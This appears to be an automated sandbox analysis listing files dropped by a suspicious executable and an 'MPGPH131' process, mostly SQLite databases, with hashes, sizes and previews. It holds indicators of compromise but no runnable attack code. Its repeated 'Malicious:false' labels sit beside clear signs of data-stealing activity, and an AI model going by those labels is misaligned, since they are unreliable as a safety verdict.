SSDEEP:192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
MD5:D2A38A463B7925FE3ABE31ECCCE66ACA
SHA1:A1824888F9E086439B287DEA497F660F3AA4B397
SHA-256:474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
SHA-512:62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
Malicious:false
Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:dropped
Size (bytes):196608
Entropy (8bit):1.121297215059106
Encrypted:false
SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:D87270D0039ED3A5A72E7082EA71E305
SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:false
Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 2
Category:dropped
Size (bytes):159744
Entropy (8bit):0.7373485529776095
Encrypted:false
SSDEEP:192:ISby5bHgtH+bF+UI3iN0RSV0k3qLyj9mJz:YlAtIkUI3iGRE3qLO6
MD5:6E23040642D39AE5B8BFCF488BF08AEC
SHA1:F8AADA3F00165FEB51AB2021906289C73216E572
SHA-256:C2CD94B96B62B72BC989CB7C266FDA787FFA6BFB57B80A2976FE39EBD1F8C786
SHA-512:46D9DEC9D1532B0800EEF979EF213C94652ABE7FF212B783E7E45D0F91E5D48D879FD3F0E2D2BBEA9AB78EE0F4D217BA0F8CCD19F757703E9B1E4FFC8CD63473
Malicious:false
Reputation:unknown
                                                                                                                                                                                                                                        Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe
                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe
                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                                                                                        Entropy (8bit):0.8439810553697228
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                                                                                                                                                                                        MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                                                                                                                                                                                        SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                                                                                                                                                                                        SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                                                                                                                                                                                        SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe
                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):159744
                                                                                                                                                                                                                                        Entropy (8bit):0.7373485529776095
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:ISby5bHgtH+bF+UI3iN0RSV0k3qLyj9mJz:YlAtIkUI3iGRE3qLO6
                                                                                                                                                                                                                                        MD5:6E23040642D39AE5B8BFCF488BF08AEC
                                                                                                                                                                                                                                        SHA1:F8AADA3F00165FEB51AB2021906289C73216E572
                                                                                                                                                                                                                                        SHA-256:C2CD94B96B62B72BC989CB7C266FDA787FFA6BFB57B80A2976FE39EBD1F8C786
                                                                                                                                                                                                                                        SHA-512:46D9DEC9D1532B0800EEF979EF213C94652ABE7FF212B783E7E45D0F91E5D48D879FD3F0E2D2BBEA9AB78EE0F4D217BA0F8CCD19F757703E9B1E4FFC8CD63473
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe
                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):196608
                                                                                                                                                                                                                                        Entropy (8bit):1.121297215059106
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                                                                                                                        MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                                                                                                                        SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                                                                                                                        SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                                                                                                                        SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe
                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                                                                                        Entropy (8bit):0.6732424250451717
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                                                                                                                        MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                                                                                                                        SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                                                                                                                        SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                                                                                                                        SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe
                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):155648
                                                                                                                                                                                                                                        Entropy (8bit):0.5407252242845243
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                                                                                                                                                        MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                                                                                                                                                        SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                                                                                                                                                        SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                                                                                                                                                        SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
Category:dropped
Size (bytes):155648
Entropy (8bit):0.5407252242845243
Encrypted:false
SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
MD5:7B955D976803304F2C0505431A0CF1CF
SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
Malicious:false
Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:dropped
Size (bytes):106496
Entropy (8bit):1.136413900497188
Encrypted:false
SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:429F49156428FD53EB06FC82088FD324
SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:false
Reputation:unknown
Process:C:\ProgramData\MPGPH131\MPGPH131.exe
File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:dropped
Size (bytes):98304
Entropy (8bit):0.08235737944063153
Encrypted:false
SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:false
Reputation:unknown
Process:C:\ProgramData\MPGPH131\MPGPH131.exe
File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:dropped
Size (bytes):5242880
Entropy (8bit):0.03859996294213402
Encrypted:false
SSDEEP:192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
MD5:D2A38A463B7925FE3ABE31ECCCE66ACA
SHA1:A1824888F9E086439B287DEA497F660F3AA4B397
SHA-256:474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
SHA-512:62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
Malicious:false
Reputation:unknown
Process:C:\ProgramData\MPGPH131\MPGPH131.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:dropped
Size (bytes):196608
Entropy (8bit):1.121297215059106
Encrypted:false
SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:D87270D0039ED3A5A72E7082EA71E305
SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:false
Reputation:unknown
Process:C:\ProgramData\MPGPH131\MPGPH131.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
Category:dropped
Size (bytes):155648
Entropy (8bit):0.5407252242845243
Encrypted:false
SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
MD5:7B955D976803304F2C0505431A0CF1CF
SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
Malicious:false
Reputation:unknown

Process:C:\ProgramData\MPGPH131\MPGPH131.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
Category:dropped
Size (bytes):20480
Entropy (8bit):0.8439810553697228
Encrypted:false
SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
MD5:9D46F142BBCF25D0D495FF1F3A7609D3
SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
Malicious:false
Reputation:unknown

Process:C:\ProgramData\MPGPH131\MPGPH131.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:dropped
Size (bytes):106496
Entropy (8bit):1.136413900497188
Encrypted:false
SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:429F49156428FD53EB06FC82088FD324
SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:false
Reputation:unknown

Process:C:\ProgramData\MPGPH131\MPGPH131.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:dropped
Size (bytes):40960
Entropy (8bit):0.8553638852307782
Encrypted:false
SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:28222628A3465C5F0D4B28F70F97F482
SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:false
Reputation:unknown

Process:C:\ProgramData\MPGPH131\MPGPH131.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:dropped
Size (bytes):196608
Entropy (8bit):1.121297215059106
Encrypted:false
SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:D87270D0039ED3A5A72E7082EA71E305
SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:false
Reputation:unknown

Process:C:\ProgramData\MPGPH131\MPGPH131.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:dropped
Size (bytes):196608
Entropy (8bit):1.121297215059106
Encrypted:false
SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:D87270D0039ED3A5A72E7082EA71E305
SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:false
Reputation:unknown

Process:C:\ProgramData\MPGPH131\MPGPH131.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
Category:dropped
Size (bytes):155648
Entropy (8bit):0.5407252242845243
Encrypted:false
SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
MD5:7B955D976803304F2C0505431A0CF1CF
SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
Malicious:false
Reputation:unknown

Process: C:\ProgramData\MPGPH131\MPGPH131.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category: dropped
Size (bytes): 106496
Entropy (8bit): 1.136413900497188
Encrypted: false
SSDEEP: 192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5: 429F49156428FD53EB06FC82088FD324
SHA1: 560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256: 9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512: 1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious: false
Reputation: unknown
Preview: SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process: C:\ProgramData\MPGPH131\MPGPH131.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category: dropped
Size (bytes): 40960
Entropy (8bit): 0.8553638852307782
Encrypted: false
SSDEEP: 48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5: 28222628A3465C5F0D4B28F70F97F482
SHA1: 1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256: 93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512: C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious: false
Reputation: unknown
Preview: SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process: C:\ProgramData\MPGPH131\MPGPH131.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category: dropped
Size (bytes): 20480
Entropy (8bit): 0.6732424250451717
Encrypted: false
SSDEEP: 24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5: CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1: 3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256: EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512: 0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious: false
Reputation: unknown
Preview: SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process: C:\ProgramData\MPGPH131\MPGPH131.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category: dropped
Size (bytes): 106496
Entropy (8bit): 1.136413900497188
Encrypted: false
SSDEEP: 192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5: 429F49156428FD53EB06FC82088FD324
SHA1: 560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256: 9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512: 1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious: false
Reputation: unknown
Preview: SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process: C:\ProgramData\MPGPH131\MPGPH131.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 2
Category: dropped
Size (bytes): 159744
Entropy (8bit): 0.7373485529776095
Encrypted: false
SSDEEP: 192:ISby5bHgtH+bF+UI3iN0RSV0k3qLyj9mJz:YlAtIkUI3iGRE3qLO6
MD5: 6E23040642D39AE5B8BFCF488BF08AEC
SHA1: F8AADA3F00165FEB51AB2021906289C73216E572
SHA-256: C2CD94B96B62B72BC989CB7C266FDA787FFA6BFB57B80A2976FE39EBD1F8C786
SHA-512: 46D9DEC9D1532B0800EEF979EF213C94652ABE7FF212B783E7E45D0F91E5D48D879FD3F0E2D2BBEA9AB78EE0F4D217BA0F8CCD19F757703E9B1E4FFC8CD63473
Malicious: false
Reputation: unknown
Preview: SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process: C:\ProgramData\MPGPH131\MPGPH131.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category: dropped
Size (bytes): 51200
Entropy (8bit): 0.8746135976761988
Encrypted: false
SSDEEP: 96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5: 9E68EA772705B5EC0C83C2A97BB26324
SHA1: 243128040256A9112CEAC269D56AD6B21061FF80
SHA-256: 17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512: 312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious: false
Reputation: unknown
Preview: SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process: C:\ProgramData\MPGPH131\MPGPH131.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 2
Category: dropped
Size (bytes): 159744
Entropy (8bit): 0.7373485529776095
Encrypted: false
SSDEEP: 192:ISby5bHgtH+bF+UI3iN0RSV0k3qLyj9mJz:YlAtIkUI3iGRE3qLO6
MD5: 6E23040642D39AE5B8BFCF488BF08AEC
SHA1: F8AADA3F00165FEB51AB2021906289C73216E572
SHA-256: C2CD94B96B62B72BC989CB7C266FDA787FFA6BFB57B80A2976FE39EBD1F8C786
SHA-512: 46D9DEC9D1532B0800EEF979EF213C94652ABE7FF212B783E7E45D0F91E5D48D879FD3F0E2D2BBEA9AB78EE0F4D217BA0F8CCD19F757703E9B1E4FFC8CD63473
Malicious: false
Reputation: unknown
Preview: SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe
File Type: ASCII text, with very long lines (369), with CRLF line terminators
Category: dropped
Size (bytes): 530
Entropy (8bit): 5.999391385907715
Encrypted: false
SSDEEP: 12:copYxSlufq7gCx7Fbyr4rOSlTfJJADr6HDsZQZ7gC6:KauS79Gr4iSllJALQZ7c
MD5: 06ED2CD304730F55A5C7001509E128BE
SHA1: 49651485B2CE3D239172BD52BF5A265AB3EB8E18
SHA-256: 66851B5AA77B3DEE71B842F53D4E30F664F5A08F9754B9E87B323871981516A4
SHA-512: 0163A8537DE695D34865EEB9C872F15A1827644D8797344A2D36E776F174E5901E77AA560488B0D7D7359B3648614F818B85A7D51F59CCDF2831B5715F5A9334
